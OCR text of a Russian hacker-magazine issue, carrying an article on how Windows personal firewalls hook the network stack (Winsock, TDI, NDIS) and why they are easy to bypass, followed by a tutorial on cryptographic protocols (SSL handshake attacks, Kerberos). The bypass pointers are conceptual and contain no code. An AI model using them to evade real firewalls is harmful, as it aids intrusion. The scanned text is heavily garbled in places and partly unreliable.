порт, либо пакетом обновления, уже 
давно выпущенным Microsoft (доста- 
точно нажать Windows Update). 

Локальный брандмауэр - очень 
глючная вещь, зачастую приводящая 
к синим экранам, блокирующая рабо- 
TY многих честных приложений, уве- 
личивающая нагрузку на процессор 
и "съедающая" часть пропускной 
способности канала. Зачем же тогда 
он нужен? 

Например, имеется локальная сеть с 
расшаренными папками и принтером. 
Чтобы не назначать на все это хозяй- 
ство труднозапоминаемые пароли, 
можно просто установить брандмауэр 
и запретить подключаться к ним изв- 
не сети. Или вот, например, мы хотим 
контролировать активность различ- 
ных приложений, не позволяя кому 
попало лезть в интернет. Может быть, 
программа передает серийный номер, 
чтобы проверить, не был ли он "спио- 


нерен", или вирус использует наш 
компьютер для рассылки спама по 
всему периметру мясокомбината. 
Стандартный пакетный фильтр, уста- 
новленный на марштутизаторе, уже 
не в состоянии справиться с этой за- 
дачей, поскольку он оперирует толь- 
ко портами и адресами, но не имеет 
никаких представлений о том, какое 
именно приложение выполнило зап- 
рос. Вот для этого и нужны локальные 
брандмауэры! Их главная и практи- 
чески единственная задача - не вы- 
пускать никого в интернет без npeg- 
варительного разрешения пользова- 
теля. Возможность блокировки вхо- 
дящих соединений также предусмот- 
рена, но, как правило, она не исполь- 
зуется, поскольку на домашнем 
компьютере не установлено никаких 
серверов. Троянские программы пер- 
вого поколения часто открывали 
один или несколько портов для уда- 
ленного управления, но сейчас эта 
практика отходит в прошлое, и чаще 
всего серверная часть устанавлива- 
ется у хакера, а вирус сам ломится к 
нему по НТТР. 

Выполняют ли брандмауэры свою 
задачу? Как сказать... С одной сторо- 
ны, часть атак они все-таки отражают 
(кстати, сканирование портов атакой 
еще не является). Тем не менее, их 
очень легко обойти. 


ПАКЕТНЫЕ ФИЛЬТРЫ 
ВО СНЕ И НАЯВУ 

и Начиная с Windows 2000 в состав 
операционной системы входит прими- 
тивный брандмауэр, который был зна- 
чительно усилен в Windows ХР (oco- 
бенно в SP2). Как маркетинговое 
средство он, может быть, и сгодится, 
но от хакеров практически никак не 
защищает. А широко разрекламиро- 
ванный Kaspersky Anti-Hacker - сов- 
сем даже не брандмауэр, а вообще 
непонятно что :). 

Мы будем говорить о "правильных" 
брандмауэрах SyGate Personal 


Firewall, Outpost Firewall, Zone Alarm u 
др., представляющих собой пакетные 
фильтры, которые встраиваются в 
стек сетевых драйверов. 

Упрощенная модель сетевой под- 
системы Windows МТ приведена на ри- 
сунке. На самом верху иерархии нахо- 
дится библиотека ws_32.dll, реализую- 
щая функции Winsock (они же "соке- 
ты"), к числу которых принадлежат 
bind, connect и др. Большинство при- 
ложений взаимодействуют с сетью 
именно через ws_32.dIl, вызовы кото- 
рой очень легко перехватить: доста- 
точно, например, заменить штатную 
библиотеку на свою собственную или 
модифицировать таблицу импорта. 
Однако это нафиг никому не нужно. 
Значительная часть трафика прохо- 
дит мимо ws_32.dll. В частности, обра- 
щения к "расшаренным" ресурсам та- 
ким пакетным фильтром уже не обна- 
руживаются. К тому же зловредные 
приложения могут беспрепятственно 
вызывать функции нижних уровней, 
работая в обход Winsock. И тем не ме- 
нее, перехват ws_32.dll все-таки ис- 
пользуется в некоторых примитивных 
брандмауэрах и баннерорезках, к ко- 
торым можно отнести ранние версии 


SyGate Personal Firewall (далее no » 
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Всякий марш- 
рутизатор мо- 
жет выполнять 
функции па- 
кетного фильт- 
ра, но далеко 
не всякий па- 
кетный фильтр 
может служить 
маршрутизато- 
ром! 


Некоторые ма- 
теринские пла- 
ты имеют ин- 


тегрированную 
карту со встро- 
енным бранд- 
мауэром. 


Брандмауэр 
может быть 
встроен в Wi-Fi 
или О$1-мо- 
дем, но чаще 
всего он реа- 
лизуется как 
прикладной па- 
кет, устанав- 
ливаемый на 
компьютер. 
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тексту просто SPF) и AtGuard (он же 
'гвардеец"). 

Nog ws_32.dll находится драйвер 
afd.sys (ancillary function driver - Bcno- 
могательный служебный драйвер), в 
котором реализованы основные опе- 
рации над сокетами: создание сокета, 
установка соединения и т.д. Факти- 
чески ws2_32.dll представляет собой 
высокоуровневую изег-поде-обертку, 
а afd.sys - ее kernel-mode часть, обра- 
зуя что-то вроде айсберга. Если быть 
совсем точным, то этих оберток целых 
две: между ws2_32.dll и afd.sys нахо- 
дится библиотека msafd.dll, на кото- 
рую садятся некоторые брандмауэры, 
пытающиеся фильтровать трафик. 
Однако это не самое удачное реше- 
ние. Во-первых, часть трафика идет 
мимо сокетов, а во-вторых, приложе- 
нию ничего не стоит обратиться к 
драйверу afd.sys напрямую. 

Спустившись на одну ступеньку 
вглубь, обнаруживаем драйвер 
tcpip.sys, сосредоточивший в себе ре- 
ализацию протоколов TCP/IP. Это так 
называемый уровень TDI (Transport 
Data Interface - интерфейс передачи 
данных), также называемый "транспо- 
ртным" уровнем или уровнем сетевых 
протоколов. Здесь же расположен 
драйвер NWLNKIPX.SYS, реализую- 
щий протокол IPX и другие сетевые 
драйверы, которые давно отошли в 
мир иной, и представляющий только 
исторический интерес. Когда компью- 
тер работает в режиме маршрутизато- 
ра или шлюза, весь традфик идет че- 
рез сетевые драйверы (главным обра- 
зом через tcpip.sys) и на верхних 
уровнях просто не появляется (впро- 
чем, если сетевая карта поддержива- 
ет режим FFP, трафик может не дойти 
и go tcpip.sys). Зловредные программы 
прикладного уровня могут вызывать 
tcpip.sys напрямую (или через высо- 
коуровневую обертку wshtcpip.dll), ми- 
нуя ws2_32.dll. Для установки TCP/IP- 
фрильтра необходимо перехватывать 
все вызовы к устройствам 
\Device\Rawip, \Device\Udp и 
\Device\Tcp. Это достигается либо вы- 


Сетевой стек - это настоящий айсберг 
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зовом loAttachDevice, либо прямой 
модификацией указателей таблицы 
диспетчеризации. 

Далее ступенькой ниже обосновал- 
ся №0!5-драйвер (Network Driver 
Interface Specification - спецификатор 
интерфейса сетевых драйверов), 
представляющий собой mini-port. Гру- 
бо говоря, это библиотека функций, 
позволяющая драйверам сетевых 
протоколов "гонять" сетевые пакеты, 
не вникая в детали реализации. Ниже 
NDIS находится только драйвер сете- 
вой карты, поэтому брандмауэр, рабо- 
тающий на NDIS-ypoBuHe, перехватыва- 
ет практически весь трафик, который 
только проходит через компьютер. 
"Практически" - потому что обраще- 
ния к обратной петле (loop back) че- 
рез NDIS не проходят и остаются не- 
замеченными, то есть, если дать ко- 
MaHgy ping 127.0.0.1, пакетный фильтр 
даже He пикнет. А это значит, что 
NDIS-6paHgmay3pbl хронически не спо- 
собны обнаруживать подключения к 
локальным службам. Если на компью- 
тере установлен Ргоху-сервер (а он 
установлен практически на всех 90- 
машних сетях), любое приложение 
может свободно выходить в Сеть и гу- 
лять по любым адресам, осуществляя 
информационный обмен во всех нап- 
равлениях. 

К тому же Ha NDIS-ypoBHe не разбе- 
решься, что за приложение ломится в 
сеть, а без этого невозможно принять 
решение, пропускать его или нет. Гра- 
мотный брандмауэр представляет со- 
бой целый конгломерат пакетных 
фильтров разных уровней, сложным 
образом взаимодействующих между 
собой. И это еще не подводная часть 
айсберга. Драйвер сетевой карты опи- 
рается на драйвер шины, через кото- 
рый проходят все "честные" вызовы. 
На уровне ядра хакер может напря- 
мую обращаться к карте через порты 
ввода-вывода или вклиниваться в 


РРР-драйвер, реализованный как 
WAN mini-port, а это будет пониже 
NDIS, по крайней мере, формально. К 
примеру, Dial-Up (он же RAS - remote 
access service, по-русски "сервис yga- 
ленного доступа") реализован Ha 
прикладном уровне, и злоумышлен- 
ник легко может вклиниться в него! 

Существует по меньшей мере три 
документированных способа для пе- 
рехвата трафика Ha NDIS-ypoBue. Это, 
во-первых, №015 Intermediate Driver 
(промежуточный драйвер №015), кото- 
рый садится между МО5-драйвером и 
драйвером сетевой карты. Методика 
так себе. Писать целый драйвер ради 
одного перехвата - решение из разря- 
да тяжеловесных, к тому же для рабо- 
ты с Dial-Up'om приходится очень кру- 
то извращаться, поэтому особой по- 
пулярности промежуточный драйвер 
не завоевал (разработчики брандмау- 
эров, как ни странно, тоже люди, и 
ничто человеческое им не чуждо). Ес- 
ли возникнет желание познакомиться 
с ним поближе, всегда можно открыть 
раздел "Intermediate NDIS Drivers and 
TDI Drivers" из DDK. 

Вторым идет Filter-Hook Driver (драй- 
вер фильтра-ловушки), представляю- 
щий собой обычный kernel-mode 
драйвер, фильтрующий сетевые паке- 
ты на уровне IP и работающий из-под 
палки. Microsoft категорически He ре- 
комендует использовать его для 
брандмауэров, и вот почему: всего 
лишь одна ловушка может быть уста- 
новлена в системе, причем она уста- 
навливается довольно "высоко" и 
зловредное приложение может легко 
отключить фильтрацию. DDK по этому 
поводу пишет: "Firewall-hook-gpanBep 
не удовлетворяет требованиям, 
предъявляемым к брандмауэру, пос- 
кольку он работает на слишком боль- 
шой высоте в сетевом стеке. Для 
обеспечения надлежащего сфункцио- 
нала на ХР и выше необходимо соз- 


Существует по меньшей мере три 
документированных способа оля перехвата 
трафика на МО5-уровне. 


TAPI-Aware 
App 


| RAS 
Transport | 


802.3 
NDISWAN 
NdisMWan Xxx 


Kernel Mode 


NDISTAPI 


Wan Miniport 


[neicard I 


Драйвер протокола 
№ 1$ 


Промежуточный 


драйвер 
NDIS 


Драйвер 
интерфейса 
сетевой карты 


РА$ - сервис удаленного доступа, ис- Псевдопромежуточный NDIS-gpanBep, 
пользуемый на Dial-Up'e используемый многими брандмауэрами 


дать NDIS intermediate miniport-gpai- 
вер, управляющий отправкой и прие- 
мом пакетов через брандмауэр". Но 
ведь находятся же такие чукчи, кото- 
рые используют firewall-hook-gpavBep 
как основное средство фильтрации! 
Третьим и последним способом пе- 
рехвата остается NDIS-Hooking Filter- 
драйвер (также называемый Pseudo- 
Intermediate NDIS Driver - псевдопро- 
межуточный NDIS-gpauBep, сокращен- 
но РМ), перехватывающий некоторые 
подмножества функций библиотеки 
NDIS для отслеживания регистрации 
протоколов и открытия сетевых ин- 
терфейсов, незаслуженно раскрити- 
кованный разработчиками Outpost 
Firewall'a. Помимо надежности к дос- 
тоинствам данного метода следует от- 
нести "прозрачную" поддержку Dial- 
Ур-интерфейса, на котором сидит 


ПРОБЛЕМЫ ПАКЕТНЫХ ФИ 


_ Любой брандмауэр - по сути, creHa 


больше половины всех пользовате- 
лей. Конкретные методики перехвата 
достаточно разнообразны, но так или 
иначе они сводятся к патчу "родного" 
NDIS-gpavBepa в памяти, что несрав- 
ненно проще реализации промежу- 
точного М05-драйвера с нуля. К тому 
же не так-то просто отключить гра- 
мотно организованный перехват. Это 
лучший способ фильтрации из всех 
имеющихся, и он используется во 
многих брандмауэрах. Однако, как 
уже отмечалось, обратная петля go 
NDIS-ypoBHa уже не доходит, да и pid 
процесса-носителя определить весь- 
ма затруднительно, поэтому одного 
лишь NDIS-qounbtTpa для реализации 
персонального брандмауэра будет не- 
достаточно. 


В ИТОГЕ 

Разумеется, существуют и другие 
способы фильтрации трабрика, но мы 
не будем рассматривать все. Главное, 
что таких способов великое множест- 
во, и ни один из них сам по себе не 
безупречен. Хороший брандмауэр 
должен комбинировать прикладные 
фильтры с фильтрами ядерного уров- 
ня, HO... НИ ОДИН ИЗ НИХ 3TOFO не дела- 
ет, что позволяет хакеру легко обойти 


защиту. МЕ 


$ЗЕСУОВИТУ - ФОКУСЫ 


Брандмауэры 
отражают 
часть атак, но 
их очень легко 
обойти. 


Примитивный 
брандмауэр в 
Windows 2000 
был усилен в 
Windows ХР 
(особенно в 
$Р2), но явля- 
ется не более 
чем рекламой. 


КЛИЕНТ | КАКРАБОТАЕТ БРАНДМАУЭР ) 


ПРОБЛЕМЫ ПАКЕТНЫХ ФИЛЬТРОВ (ПРОДОЛЖЕНИЕ) 
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Все брандмау- 
эры делятся на 
два типа: па- 
кетные фильт- 
ры и фильтры 
уровня прило- 
жений. 


} 


Пакетный 
фильтр - это 
маршрутиза- 
тор. 


= 


Фильтры уров- 
ня приложений 
- это прокси. 
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ПРОБЛЕМЫ ПАКЕТНЫХ ФИЛЬТРОВ (ОКОНЧАНИЕ) 
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"Правильные" 
брандмауэры: 
SyGate 
Personal 
Firewall, 
Outpost 
Firewall, Zone 
Alarm и gp. 


В LINUX и 
FreeBSD пакет- 
ный фильтр 
изначально 
встроен в 
ТСРЛР-драй- 
вер, что позво- 
ляет избежать 
множества 
проблем. 


Приблизительная структура сети интернет (вид из космоса) 
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ПРОТОКОЛ СДЕЛАЙ ЭТО БЕЗОПАСНЫМ!) 


Alek Silverstone (aleksi@pisem.net) 


СДЕЛАЙ ЭТО < — 
БЕЗОПАСНЫМ! 


СОЗДАНИЕ И ИССЛЕДОВАНИЕ 
КРИПТОГРАФИЧЕСКИХ ПРОТОКОЛОВ 


ворчество... Созидание... Во все времена человек стремился создать что-ни- 

будь свое, удивительное и непонятное. Программисты никогда не были иск- 
лючением, но им приходится заботиться еще и о пользе продуктов, удобстве и 
скорости работы с ними... Какая уж тут безопасность! И все-таки основной 
целью труда программиста должна быть именно безопасность всегда и во всем. 


4 


амое главное - обеспечить 


комплексный характер защи- 


ты. Прочность цепи определя- 


ется прочностью ее самого 
слабого звена. В этой статье я 
расскажу лишь об одном аспекте безопас- 
ности - защищенных криптографических 
протоколах. Начнем с азов, то есть с моделей 
криптосистем. 


ОБЩИЕ МОДЕЛИ 

Итак, у нас есть базовая модель (рис. 1). 
Что можно сказать о ней? Несмотря на при- 
зывы защищать все соединения, именно эта 
модель используется шире всего :( по самым 
разным причинам: иногда невозможно реа- 
лизовать на практике любую другую модель, 
а чаще из-за лени программистов. 

Рисунок, думаю, все разъяснил: есть два 
субъекта, обменивающихся информацией, и 
перехватчик со снифером. В более общем 
случае последний сможет также изменять 
сообщения по своему желанию, навязывать 
свои сообщения другим и изымать сообще- 
ния из канала обмена - это называется ак- 
тивным перехватом. Если взять такую мо- 
дель и предположить, что противник с лег- 
костью реализует активный перехват, мы по- 
лучим основу для всех остальных моделей. 

И ее первая модификация - это одноключе- 
вая (симметричная) криптосистема (рис. 2). 

Эта модель - вторая по популярности в ре- 
ализации. Перед передачей сообщения в 
открытый канал отправитель преобразовы- 
вает его, то есть зашифровывает секретным 
ключом. А на другом конце, для получения 
исходной информации, выполняется обрат- 
ный процесс - дешифрование на том же са- 
мом ключе. Сам ключ передается по секрет- 
ному каналу, благодаря которому передавае- 


мая информация гарантированно становится 
аутентичной (целостной и подлинной) и не- 
доступной для противника. Криптография 
"знает" целых семь видов атак на такую мо- 
дель (OT атаки по шифротексту и до атаки на 
основе выборочных текстов, при которой 
противник может зашифровать и дешифро- 
вать произвольное количество текстов, вы- 
бирая следующие на основе предыдущих ре- 
зультатов), но их классификация довольно 
скучна, поэтом я опустил ее. Но вот ты пос- 
мотрел на рисунок, и тут же у тебя родился 
вопрос: "А что есть защищенный канал?" В 
идеале ключ должен быть отправлен полу- 
чателю на носителе, носитель в чемоданчи- 
ке, чемоданчик у охраны, охрана в брониро- 
ванной машине, сразу после доставки и 
раскрытия носитель должен быть уничто- 
жен. При таком раскладе противнику 
действительно легче взломать компьютер, а 
не сейф на колесах. С другой стороны, если 
есть возможность передавать ключ ПО ТА- 
КОМУ секретному каналу, то почему бы не 
передавать по нему любую информацию ;)? 
Кроме того, есть еще одна проблема - уста- 
ревание ключей. В идеале симметричный 
ключ должен использоваться только один 
раз: знание нескольких пар открытый 
текст/шисфротекст может помочь криптоана- 
литику (хакеру со снифером уже ничто не 
поможет :)). Так что же получается? Каждый 
раз машину отправлять?! Эти (и не только) 
проблемы решило появление двухключевой 
(асимметричной) модели (рис. 3). 

Думаю, ты прекрасно знаешь, что такое 
секретный и открытый ключи и как работает 
эта модель. Еще лучше ты знаешь, что если 
поменять местами секретный и открытый 
ключи, то получится электронно-цифровая 
подпись (ну, не совсем - об этом ниже). Тут я 
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Рис. 2. Модель с одним ключом 


разве что обращаю всеобщее внима- 
НИЕ на замену секретного канала ау- 
тентичным. Последний доступен про- 
тивнику оля пассивного перехвата - 
целостность и принадлежность долж- 
ны по-прежнему соблюдаться. Эта 
схема также не лишена недостатков. 
Самым большим из них является низ- 
кое быстродействие: например, асим- 
метричный алгоритм RSA примерно в 
100 раз медленнее симметричного 
DES'a. 

Применение гибридной схемы наи- 
более желательно (рис. 4). 

В ней исходное сообщение шифру- 
ется симметричным ключом, который 
в свою очередь зашифровывается 
открытым ключом получателя. Пос- 
ледний дешифрует симметричный 
ключ, которым дешисфрует сообще- 
ние. Симметричный ключ случаен и 
используется только в этом сеансе 
связи, потому-то он и называется се- 
ансовым. Канал связи и противник на 
рисунке не уместились :). Подробнее 
06 этой схеме в следующем разделе. 


ПРОТОКОЛ SSL 

и Пожалуй, пора несколько прибли- 
зиться к практике. В качестве примера 
я рассмотрю всем известный протокол 
SSL, точнее, ход мыслей его разработ- 
чиков :). Саму спецификацию протоко- 
ла можно утянуть с 
wp.netscape.com/eng/ssl3. Протокол будет 
рассмотрен на примерах обмена между 
клиентом Андреем и сервером Банком. 
А вкачестве противника выступит из- 
вестный герой Василий Пупкин. 


Рис. 4. Оптимальный вариант 


Привет 
Привет, я Банк 


Шифровать {Хэшировать ( Привет, я Банк), секретный _ключ_Банка) 
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Привет, я Банк 
открытый _ключ_Банка 
Докажи 

Привет, я Банк 
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Предположим, Андрей хочет прове- 
рить, действительно ли Банк является 
тем же лицом, за кого выдает себя. 
Банк имеет открытый и секретный 
ключи, Анарей не имеет своей пары 
(хотя это идеологически неверно - 
смотри конец этого пункта) и может 
пользоваться только открытым клю- 
чом Банка. Будем считать, что Андрей 
уже знает его (способ передачи я 
уточню позднее). Тогда для проверки 
подлинности источника информации 
может быть использован протокол №1 
(на соответствующем рисунке). 

Андрей принимает сообщение и де- 
шифрует его на открытом ключе Бан- 
ка. Если результат совпадает с тем со- 
общением, которое отослали изна- 
чально, то Б действительно является 
Банком. 

Как же поведет себя Василий? Сооб- 
щение случайно - Вася воспользует- 
ся именно этим и реализует свою ата- 


Асимметричный алгоритм RSA 
примерно в 100 раз медленнее 
симметричного DES'a. 


A -> G случайное сообщение 


Протокол 1 


Б -> й Шиоровать (случайное сообщение, секретный _ключ_Банка) 


й -> В 
В -> Б Сжать (договор) 


случайное сообщение 


Б -> A Шифровать(Сжать (договор), секретный_ключ_Банка} 


'Атака на протокол 1 


Шифровать (Хэшировать (Привет, я банк), секретный _ключ_Банка) 


Протокол 3: распределение ключей 


Прежде чем 
переходить к 
практике, со- 
ветую разоб- 
раться с 
теорией ;). 


ку так, как показано на рисунке "Ата- 
ка на протокол 1". 

На втором шаге одного из вариан- 
тов своего поведения злобный Васи- 


лий готовит невыгодный для банка Помни, что 
договор и использует функцию сжа- разработка 
тия для преобразования текста в дво- пай 
ичный шум, который может быть при- о 


нят Банком за случайное сообщение. ется законами 
Если все прошло именно так, то Банк РФ. 

попал :). Всегда можно доказать, что 

договор был зашифрован на уни- 

кальном секретном ключе Банка. 

Положение может быть исправлено 
за счет использования хэш-сфункции. 
Напомню (или сообщу), что хэш-функ- 
цией называют функцию, обладаю- 
щую следующими свойствами: 

©. Входным параметром является 
текст произвольного размера. 

©. Выходное значение имеет строго 
фиксированный размер. 

©. Значение функции от любого ар- 
гумента должно вычисляться быстро. 

@. Задача нахождения аргумента 
функции по ее значению должна 
быть вычислительно трудоемкой - 
функция однонаправленная. 

©. Задача нахождения такой пары 
аргументов, при которой значения 
функций от них одинаковы (нахожде- 
ние коллизии), должна быть вычисли- 
тельно трудоемкой. 

Применяя хэш-сффункцию, можно COC- 
тавить протокол №2 (посмотрим на со- 
ответствующий рисунок). 

В этом случае Банк сначала посыла- 
ет свое сообщение открытым текстом, 
после этого - зашифрованное на сво- 
ем секретном ключе значение хэш- 
функции от своего сообщения, что, по 
большому счету, есть не что иное, как 
электронно-цифровая подпись этого у 
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Более подроб- 
Ho об OpenSSL 
смотри в 
статье Тохи 
"101 прием pa- 
боты с 
OpenSSL" в Х 
#02/2005. 


Если будешь 
использовать 
чужие реали- 
зации, то не 
забывай об- 
новлять их - 
ошибки реали- 
зации выявля- 
ются не так уж 
редко. 


СДЕЛАЙ ЭТО БЕЗОПАСНЫМ! ) 


A -> Б Привет 

Б -> A Привет, я Банк 

Б -> A сертификат_Банка 
A -> Б Докажи 

B-> A 


Шифровать (Хэшировать (Привет, я Bank), секретный _ключ_Ббанка) 


Протокол 4: сертификаты 


A -> Б Привет 

Б -> A Привет, я Банк 

Б -> й сертификат_Банка 

A -> Б Докажи 

Б -> A Шифровать (Хэшировать (Привет, я Банк), секретный _ключ_банка) 
A -> GB Шоровать(сеансовый_ключ, открытый _ключ_Банка) 

Б -> A Шоровать (сообщение, сеансовый_ключ) 


<2 Привет 

-> Привет 

-> Привет, я Банк 

=> сертификат_Банка 

-> Привет, я Банк 

> сертификат _банка 
Докажи 

= Докажи 


|--8-:9--№Е-30--№0-:0--№Е-20---- = ВЕ 
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ad 
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Шифровать (Хэшировать (Привет, я Банк), CekpeTHb_Kaw4_Banka) 
Шифровать (Хэшировать (Привет, я Банк), секретный ключ_банка) 
Шифровать (сеансовый_ключ, открытый ключ_Банка) 

Шифровать (сеансовый_ключ, открытый _ключ_Банка) 

Шифровать (сообщение, сеансовый_ключ) 

Исказить (Шифровать (сообщение, сеансовый_ключ) } 


Атака на протокол 5 


сообщения. Андрей расшифровывает 
полученное значение, хэширует ис- 
ходное сообщение и сравнивает ре- 
зультаты - проверяет подпись. Совпа- 
дение значений хэш-сфункций являет- 
ся доказательством того, что Банк яв- 
ляется подлинным источником ин- 
формации. 

Теперь будем составлять протокол 
передачи открытого ключа Банка Анд- 
рею. Посмотрим на первый вариант 
(протокол 3). 

В нем Вася может выдать себя за 
Банк. Для этого ему всего лишь нуж- 
но иметь свою пару ключей. Он будет 
перехватывать все обращения AHg- 
рея Банку и отвечать на них, подстав- 
ляя свой открытый и секретный клю- 
чи вместо ключей Банка. Андрей же 
не имеет возможности обнаружить 
nognor. 

Эта проблема, известная как проб- 
лема распределения ключей, решает- 
ся в SSL путем введения сертифика- 
тов, как и во многих протоколах (gpy- 
гой способ решения этой проблемы - 
использование доверителей - реали- 
зован, к примеру, в РСР). Сертификат 
выдается центром сертификации 
(Certification Authority, СА) и содержит 
следующие обязательные поля: 

ш Серийный номер сертисфиката; 

mw Имя центра сертификации; 

и Имя объекта сертификации; 

ш Открытый ключ объекта сертифи- 
кации; 

ш Срок действия сертисриката. 

Здесь речь идет об объекте серти- 
фрикации. Это может быть все что 
угодно: человек, программа, сайт, обо- 
рудование и T.g. Сертификат подписы- 
вается секретным ключом СА и вык- 
ладывается в открытый доступ. 
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Посмотрим на рисунок "Протокол 4: 
сертификаты" и разберемся. 

Для начала обращаю всеобщее 
внимание на тот факт, что и Анд- 
рей, и Банк должны полностью go- 
верять СА, а он должен оправды- 
вать это доверие :). Другими слова- 
ми, все должны быть уверены, что 
сертификат Банка принадлежит 
именно Банку. 

Получив сертификат, Андрей про- 
веряет его подпись, объект сертифи- 
кации (им должен быть Банк), срок 
действия и убеждается в подлиннос- 
ти открытого ключа Банка. Необходи- 
мый для этого открытый ключ СА 
выкладывается в открытый доступ. 
Если наш бравый Вася пошлет AHg- 
рею сертификат Банка от своего 
имени, то он все равно выдаст себя с 
головой: не зная секретного ключа 
Банка, он не сможет отправить пос- 
леднее сообщение. 

Убедившись в подлинности источ- 
ника информации, Андрей генерирует 
симметричный сеансовый ключ, шиср- 
рует его открытым ключом Банка и 
отправляет. Банк дешиофрует сообще- 
ние своим секретным ключом и полу- 
чает сеансовый ключ. Таким образом, 
метод двухключевой криптографии 
применяется для пересылки сеансо- 
вого ключа с последующим использо- 
ванием его в схеме симметричного 
шифрования - гибридная модель. 


Рассмотрим этот протокол на схеме 
"Протокол 5". 

Итак, в этом случае Василий не зна- 
ет сеансового ключа, однако он по- 
прежнему может искажать передавае- 
мые сообщения (рисунок "Атака на 
протокол 5"). 

После обмена сеансовым ключом 
Анорей и Банк адекватно воспринима- 
ют сообщения друг друга. Едва ли Ва- 
силий сможет получить в результате 
искажения что-то осмысленное, но по- 
дорвать доверие Андрея к Банку он 
вполне сможет. 

Проблема решается введением за- 
висимости передаваемых сообщений 
от общей для Андрея и Банка секрет- 
ной информации, для чего служит код 
аутентификации сообщения (Message 
Authentication Code, MAC), вычисляе- 
мый как значение хэш-сфункции OT 
стыковки передаваемого сообщения и 
секретного ключа: 

МАС:=Хэшировать(сообщение+сеан- 
СОвВыЙ_кКЛлЮЧчЧ) 

Протокол, который реализует все 
вышесказанное, известен под назва- 
нием SSL v3 (точнее, его вариант для 
случая, когда один из участников не 
имеет сертификата), он достаточно 
прост и показан на рисунке. 

Теперь Андрей и Банк имеют воз- 
можность обнаруживать действия 
Василия, который, не зная сеансово- 
го ключа, не может вычислить пра- 
вильное значение хэш-сфункции. Кри- 
терием является результат сравне- 
ния дешифрованного МАС'а и МАС‘а, 
вычисленного от принятого дешиф- 
рованного сообщения и сеансового 
ключа. 

Описанный здесь протокол служит 
для защиты Аноарея от Банка и для 
обороны обеих сторон от Василия. 
Понятно, что нет никакой гарантии, 
что Андрей окажется лучше Пупкина 
:). Для защиты Банка все его клиенты 
должны иметь свои сертификаты. Со- 
ответственно, меняется и протокол: в 


Логотип Kerberos 


Привет 

Привет, я Bank 
сертификат_Ббанка 
Шифровать (Хэшировать (Привет, я банк), секретный_ключ_банка} 
Шифровать {сеансовый ключ, открытый _ключ_Ббанка) 
Шифровать { сообщение+ НАС, сеансовый_ ключ) 


ADA oo > 
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О ШВЕЙЦАРСКИХ ЧАСАХ 


Объектами сетевого взаимодействия 
в модели Kerberos являются клиенты 
и серверы 


него добавляется передача сертифри- 
ката AHgpea и его проверка. Я не го- 

ворил об этом с самого начала лишь 
ради упрощения разбора протокола. 


ПРОТОКОЛ KERBEROS 
Рассмотрим еще один криптопро- 
токол - Kerberos. Он служит для про- 
верки подлинности в ТСРЛР-сетях с 
доверенной третьей стороной. Служ- 


6a Kerberos, работающая в Сети, 
действует как доверенный посредник 
и обеспечивает проверку подлиннос- 
ти сетевых объектов. Протокол был 
разработан в Массачусетском техно- 
логическом университете (MIT, 
web.mit.edu/kerberos/www), и в насто- 
ящее время его пятая версия являет- 
ся стандартом (RFC-1510). Kerberos no- 
лучил широкое распространение: он 


входит во многие дистрибутивы Linux, 
a Microsoft сделала этот протокол (с 
незначительными изменениями, опи- 
санными в RFC-3244) основным про- 
токолом аутентификации начиная с 
Windows 2000. Отличительной осо- 
бенностью данного протокола являет- 
ся то, что в нем не используются 
двухключевые алгоритмы. В этом раз- 
деле под сочетанием "секретный 
ключ" я понимаю постоянный симмет- 
ричный ключ, чтобы в статье можно 
было отличить его от сеансового сим- 
метричного ключа. 

Объектами сетевого взаимодей- 
ствия в модели Kerberos являются 
клиенты и серверы, причем первыми 
могут быть как пользователи, так и 
независимые программы. В базе дан- 
ных центральной службы системы, ко- 
торую чаще всего и называют Цербе- 
ром, хранятся данные всех клиентов и 
их секретные ключи. Для пользовате- 
лей ключ является хэш-сункцией от 
введенного пароля. Также Цербер 
хранит секретные ключи всех Служб 
выделения мандатов (Ticket-Granting 
Service, TGS). TGS, в свою очередь, 
хранит секретные ключи обслуживае- 
мых ею серверов в Сети. 

Для того чтобы объяснить сообще- 
ния этого протокола, нужно ввести 
понятия мандата и удостоверения. 
Мандат - это особое сообщение, кото- 
рое удостоверяет право клиента об- 
ратиться к серверу, используется для 
безопасной передачи идентификато- 
ра клиента серверу. Мандат для объ- 
ектов a и Б определяется так (знак "+" 
означает стыковку): 

М(а,5):=6+Шифро- 
BaTb(a+IP_a+dT+C(a,b), K_b) 

Обозначения a и Ь - имена объек- 
тов, IP_a - IP-agpec объекта a, dT - 
срок действия мандата, C(a,b) - сеан- 
совый ключ gna a ub, K_b - секрет- 
ный ключ Б. Видно, что объект а не 
может расшифровать мандат (он не 
знает секретного ключа объекта Б), 
но способен передать его в неизмен- 
ном виде. Мандат может быть исполь- 
зован много раз, пока не истечет 
срок его действия. Удостоверение - 
это приложение к мандату. OHO опре- 
деляется так: 

Y(a):=at+IP_att 

где t - временная метка. В отличие 
от мандата, удостоверение использу- 
ется только один раз, именно для это- 
го и применяется метка времени. 

Теперь перейдем к самому протоко- 
лу. На первом шаге клиент отсылает 
Церберу открытое сообщение, содер- 
жащее имя клиента и имя нужной 
TGS. 

Клиент -> Цербер: имя_клиен- 
Tatuma_TGS 

Цербер ищет в своей базе данные о 
клиенте и сравнивает |P-agpec отпра- 
вителя с адресом, хранящимся в базе. 
Если они совпадают, служба генери- 
рует сеансовый ключ, который будет 
использоваться при обмене между 
клиентом и TGS, и шифрует ero сек- 
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Подспорьем 
для изучения 
этой темы ста- 
нет хорошая 
книжка. Толь- 
ко выбирай с 
умом :). 


Тщательно 
проверяй свои 
протоколы. 
Возможно, сто- 
ит поискать 
информацию 
по ВАМ-логике. 
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ретным ключом клиента. Затем Цер- 
бер генерирует для клиента разреше- 
ние на выделение мандата (а оно и 
является мандатом), доказывающее 
TGS подлинность клиента. Оба сооб- 
щения отсылаются: 

Цербер -> Клиент: Шифро- 
вать(С(клиент, TGS), К_клиент) 

Цербер -> Клиент: М(клиент, TGS) 

Не забудем, что основная часть ман- 
дата зашифрована секретным клю- 
чом ТС5. Клиент расшифровывает 
первое сообщение своим секретным 
ключом и получает сеансовый ключ 
для связи с TGS. 

На следующем этапе клиенту тре- 
буется получить отдельный мандат 
для связи с нужным ему сервером, 
который он может получить у TGS. 
Он составляет удостоверение и 
шифрует его полученным на преды- 
дущем шаге сеансовым ключом TGS. 
Также он передает имеющийся у не- 
го мандат на выделение мандата в 
неизменном виде: 

Клиент -> TGS: Шифровать(У(кли- 
ент), С(клиент, ТС5)) 

Клиент -> TGS: М(клиент, TGS) 

TGS, получив запрос, расшифровы- 
вает мандат своим секретным ключом. 
Затем, используя включенный в ман- 
дат сеансовый ключ, расшифровыва- 
ет удостоверение клиента. Наконец, 
